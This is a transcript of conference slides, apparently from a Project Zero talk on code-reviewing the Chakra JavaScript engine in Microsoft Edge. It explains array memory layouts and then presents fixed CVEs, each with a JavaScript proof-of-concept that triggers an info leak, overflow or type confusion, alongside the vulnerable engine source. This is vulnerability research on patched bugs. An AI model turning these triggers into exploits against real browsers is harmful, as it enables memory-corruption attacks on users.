hunting bugs in the microsoft edge script engine...
TRANSCRIPT
![Page 1: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/1.jpg)
The ECMA and the ChakraHunting bugs in the Microsoft Edge Script Engine
![Page 2: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/2.jpg)
About Me
● Natalie Silvanovich AKA natashenka
● Project Zero member● Flash researcher● ECMAScript enthusiast
![Page 3: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/3.jpg)
Microsoft Edge Research
● Code reviewed script engine (Chakra)● Found 13 bugs, now fixed● First modern browser review● Learned a lot about JavaScript
![Page 4: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/4.jpg)
This talk
● What is Edge/Chakra/ECMAScript?● Script engine features and design● Bugs
![Page 5: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/5.jpg)
Introduction
![Page 6: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/6.jpg)
What are Edge and Chakra
● Edge: Windows 10 browser● Chakra: Edge’s open-source ECMAScript core
○ Regularly updated○ Accepts external contributions
![Page 7: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/7.jpg)
What is ECMAScript
● ECMAScript == Javascript (mostly)● Javascript engines implement the ECMAScript
standard● ES7 released in June
![Page 8: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/8.jpg)
Features and Implementation
![Page 9: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/9.jpg)
Script Engine Design
● Key features○ Arrays○ Objects○ Typing○ Garbage collection
![Page 10: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/10.jpg)
Array Design
● Arrays are a foundational element of script engines (second only to Objects)
● Sounds simple, but details are complicated
![Page 11: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/11.jpg)
Array Design
var array = [1, 2, 3, 4];
var array2 = new Array(1, 2, 3, 4);
![Page 12: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/12.jpg)
Array Design
var a = [“bob”, “joe”, “kim”];
var b = [1, “bob”, {}, new RegExp()];
var c = [[], [[]], [[], []]];
var d = [1, 2, 3];
d[10000] = 7;
![Page 13: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/13.jpg)
Array Design
var a = [1, 2, 3];
a[“banana”] = 4;
a.grape = 5;
![Page 14: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/14.jpg)
Array Design
var a = [1, 2, 3];
Object.defineOwnProperty(a, “0”,
{value : 1, writable : false});
var b = [“hello”];
Object.freeze(b);
![Page 15: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/15.jpg)
Array Design
var a = [1, 2, 3];
Object.defineOwnProperty(a, “0”,
{get : func, set : func});
![Page 16: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/16.jpg)
Array Design
var a = [0, 1, 2];
a[4] = 4;
a.__proto__ = [0, 1, 2, 3, 4, 5];
alert(a[3]); // is 3
![Page 17: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/17.jpg)
Array Object
__proto__
0
1
...
Array.prototype
__proto__
sort
slice
...
Object.prototype
__proto__
__defineGetter__
toString
...
![Page 18: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/18.jpg)
Array Design
var a = [0, 1, 2];
a[4] = 4;
a.__proto__ = [];
Object.definePropety( a.__proto__,
“0”, {get : func, set : func});
![Page 19: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/19.jpg)
Array Design
Object.defineProperty(Array.prototype,
“0”, {get : func, set : func});
var a = [];
alert(a[0]); // calls func
![Page 20: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/20.jpg)
Array Design
var a = [0, 2, 1];
a.slice(a, 1); //[2, 1];
a.splice(a, 1, 1, 3, 4); //[0, 3, 4];
a.sort(); // [0, 1, 2];
a.indexOf(1); // 2
![Page 21: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/21.jpg)
Array Promotion
● The vast, vast majority of arrays are simple, but some are very complicated
● Every modern browser has multiple array memory layouts and events that trigger transitions between the two
![Page 22: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/22.jpg)
Chakra Implementation
IntegerArrayFloatArray
VarArrayES5Array
Add a float
Add a non-numeric value
Configure a value (e.g read-only)
![Page 23: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/23.jpg)
Array Conversion
● Integer, Float and ES5 arrays are subclasses of Var Array superclass
● vtable swapping (for real)
![Page 24: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/24.jpg)
Array Memory Layout
IntArray
vtable
length
head
...
IntSegment
length
size
left
next
element[0]
...
![Page 25: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/25.jpg)
Array Format
● Limited sparseness○ A dense array is just a sparse array with one segment○ Arrays only become property arrays in exceptional situations (a property on
an index)
● Array segments can be inline
![Page 26: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/26.jpg)
Array Memory Layout
IntArray
vtable
length
head
...
IntSegment
length
size
left
next
element[0]
...
![Page 27: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/27.jpg)
Array Memory Layout
IntArray
vtable<FloatArray>
length
head
...
IntSegment
length
size
left
next
element[0]
...
![Page 28: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/28.jpg)
Array Memory Layout
IntArray
vtable<FloatArray>
length
head
...
FloatSegment
length
size
left
next
element[0]
...
![Page 29: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/29.jpg)
(Simple) Object Format
● Objects are similar to Arrays, but optimized for properties instead of elements
● Similar setup, with simple and dictionary properties and transitions○ Also exotic types, like deferred and path
● Less bug prone
![Page 30: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/30.jpg)
Objects
var o = new Object();
o.prop = “hello”;
var o2 = { prop : “hello”};
![Page 31: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/31.jpg)
Objects
var o = { month : “April”, day : 14}
var o1 = { “1” : 1, “2” : “test”};
var o2 = { prop : { prop : {} }};
var o3 = Object.freeze( o2 );
![Page 32: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/32.jpg)
Interesting Question
var a = [0, 1, 2, 3];
var o = { “0” : 0, “1” : 1, “2” : 2, “3” : 3 };
a.__proto__ = null;
o.__proto__ = null;
Array.prototype.slice.call(a, 0, 2); // [0, 1]
Array.prototype.slice.call(o, 0, 2); // [0, 1];
![Page 33: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/33.jpg)
Objects
var a = [0, 1, 2, 3];
var o = { “0” : 0, “1” : 1, “2” : 2, “3” : 3 };
o.length = “banana”;
a.length = “banana”; //Uncaught RangeError: Invalid array length
![Page 34: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/34.jpg)
Script Engine Terminology
● “Fast path” == “when things are normal”○ Optimized behaviour when objects are in common or
expected states○ But are they?
● “Slow path” == “handles all cases safely and correctly”○ But does it?
![Page 35: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/35.jpg)
Complex Objects
● Objects can also be built-in types with special memory backings○ RegExp, Map, Set, Function, etc.
● Classes can be declared, extending any of these types
![Page 36: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/36.jpg)
Typing
● Objects need handles to be used by script● Script needs to differentiate between types● In Chakra:
○ Handles are either pointers or ints, differentiated by the 48th bit
○ Pointer handles can point to any object types, and a field in the object needs to be checked
![Page 37: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/37.jpg)
Typing
var i = 7; // handle = (7|(1<< 48))
= 0x1000000000007L;
var o = {}; // handle = ptr
var r = new RegExp(); // handle = ptr
![Page 38: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/38.jpg)
Garbage Collection
● Can be conservative or non-conservative○ Chakra is very conservative
![Page 39: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/39.jpg)
Bugs
![Page 40: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/40.jpg)
CVE-2016-7189
● Info leak in Array.join due to Array index getter
![Page 41: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/41.jpg)
CVE-2016-7189var t = new Array(1,2,3); Object.defineProperty(t, '2', { get: function() { t[0] = {}; for(var i = 0; i < 100; i++){ t[i] = {a : i}; } return 7; } });var s = [].join.call(t);
![Page 42: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/42.jpg)
CVE-2016-7189
JavascriptString* JavascriptArray::JoinArrayHelper(T * arr, JavascriptString* separator, ScriptContext* scriptContext) {
... for (uint32 i = 1; i < arrLength; i++) { if (hasSeparator) { cs->Append(separator); }
if (TryTemplatedGetItem(arr, i, &item, scriptContext))
![Page 43: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/43.jpg)
CVE-2016-3386
● Another issue due to a getter on an array● An overflow this time
![Page 44: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/44.jpg)
CVE-2016-3386
function q(){}
var t = [1, 2];
t.length = 4;
Object.defineProperty(t, '3',
{ get: function() {t.length = 10000; }});
q(...t);
![Page 45: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/45.jpg)
CVE-2016-3386
if (argsIndex + arr->GetLength() > destArgs.Info.Count){AssertMsg(false, "The array length has changed since we
allocated the destArgs buffer?");Throw::FatalInternalError();
}
for (uint32 j = 0; j < arr->GetLength(); j++){var element;if (!arr->DirectGetItemAtFull(j, &element)){
element = undefined;}
destArgs.Values[argsIndex++] = element;}
![Page 46: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/46.jpg)
CVE-2016-7202
● Segmentation issue due to array index interceptor
![Page 47: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/47.jpg)
CVE-2016-7202
var a = [1];a.length = 1000;var o = {};Object.defineProperty(o, '1', { get: function() { a.length = 1002; j.fill.call(a, 7.7); return 2; }});a.__proto__ = o;var r = [].reverse.call(a);r.length = 0xfffffffe;r[0xfffffffe - 1] = 10;
![Page 48: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/48.jpg)
CVE-2016-7202
length = JavascriptConversion::ToUInt32( JavascriptOperators::OP_GetLength(obj, scriptContext), ...);
…
pArr->FillFromPrototypes(0, (uint32)length);
…
seg->left = ((uint32)length) - (seg->left + seg->length);
![Page 49: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/49.jpg)
Array.species
“But what if I subclass an array and slice it, and I want the thing I get back to be a regular Array and not the subclass?”
class MyArray extends Array { static get [Symbol.species]() { return Array;}
}
● Easily implemented by inserting a call to script into *every single* Array native call
![Page 50: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/50.jpg)
CVE-2016-7200 (Array.filter)
● Bug in Array conversion due to Array.species
![Page 51: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/51.jpg)
CVE-2016-7200
class dummy{constructor(){ return [1, 2, 3]; }
}class MyArray extends Array { static get [Symbol.species]() { return dummy; }}var a = new MyArray({}, [], "natalie", 7, 7, 7, 7, 7);function test(i){ return true; }var o = a.filter(test);
![Page 52: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/52.jpg)
CVE-2016-7200 (Array.filter)
RecyclableObject* newObj = ArraySpeciesCreate(obj, 0, scriptContext);...newArr = JavascriptArray::FromVar(newObj);…if (!pArr->DirectGetItemAtFull(k, &element))...selected = CALL_ENTRYPOINT(callBackFn->GetEntryPoint(), callBackFn, CallInfo(CallFlags_Value, 4), thisArg, element, JavascriptNumber::ToVar(k, scriptContext), pArr);
if (JavascriptConversion::ToBoolean(selected, scriptContext)){ // Try to fast path if the return object is an array if (newArr) { newArr->DirectSetItemAt(i, element);
![Page 53: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/53.jpg)
Proxy
“But what if I want to debug Javascript in Javascript?”
var handler = { get: function(target, name){ return name in target? target[name] : 37; }};var p = new Proxy({}, handler);
![Page 54: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/54.jpg)
CVE-2016-7201
● Array conversion error due to array prototype fallback
![Page 55: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/55.jpg)
CVE-2016-7201
var a = new Array(0x11111111, 0x22222222, 0x33333333, ...var handler = { getPrototypeOf: function(target, name){ return a; }};var p = new Proxy([], handler);var b = [{}, [], "natalie"];b.__proto__ = p;b.length = 4;
a.shift.call(b); // b[2] is type confused
![Page 56: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/56.jpg)
CVE-2016-7201
void JavascriptArray::InternalFillFromPrototype(JavascriptArray *dstArray, const T& dstIndex, JavascriptArray *srcArray, uint32 start, uint32 end, uint32 count){ RecyclableObject* prototype = srcArray->GetPrototype(); while (start + count != end && JavascriptOperators::GetTypeId(prototype) != TypeIds_Null) { ForEachOwnMissingArrayIndexOfObject(srcArray, dstArray, prototype, start, end, dstIndex, [&](uint32 index, Var value) { T n = dstIndex + (index - start); dstArray->DirectSetItemAt(n, value); count++; }); prototype = prototype->GetPrototype(); }}
![Page 57: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/57.jpg)
Internal Scripts, Strict Mode and Redefinition
● Sometimes JavaScript functions are written in script, especially slow path○ More foolproof than natives○ Problematic if user code can alter its behaviour (due to
developer assumptions)● Strict mode is only part of the solution
![Page 58: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/58.jpg)
Internal Scripts, Strict Mode and Redefinition
“use strict”;function do_builtin_stuff(){
var o = {};o.stuff = {};Object.freeze(o);global.nativeChangeStuff( o );return o;
}
![Page 59: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/59.jpg)
Internal Scripts, Strict Mode and Redefinition
● Two problems
![Page 60: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/60.jpg)
Internal Scripts, Strict Mode and Redefinition
● Two problems
“use strict”;
function f(){ this.stuff = 7 };Object.defineProperty(Object.prototype,
“stuff”, {get : f, set : f});
![Page 61: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/61.jpg)
Internal Scripts, Strict Mode and Redefinition
“use strict”;function do_builtin_stuff(){
var o = {};o.stuff = {};Object.freeze(o);global.nativeChangeStuff( o );return o;
}
![Page 62: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/62.jpg)
Internal Scripts, Strict Mode and Redefinition
“use strict”;
function f(){ this.stuff = 7 };Object.freeze = f;
![Page 63: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/63.jpg)
Internal Scripts, Strict Mode and Redefinition
“use strict”;function do_builtin_stuff(){
var o = {};o.stuff = {};Object.freeze(o);global.nativeChangeStuff( o );return o;
}
![Page 64: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/64.jpg)
Internal Scripts, Strict Mode and Redefinition
● More frequent as slow paths move to script● Chakra uses less “host script” than other
browsers○ Internationalization only
![Page 65: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/65.jpg)
CVE-2016-7287
● Type confusion in internationalization due to lack of type checking
![Page 66: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/66.jpg)
CVE-2016-7201
In host JS:Object.defineProperty(Intl, "Collator", { value: Collator,
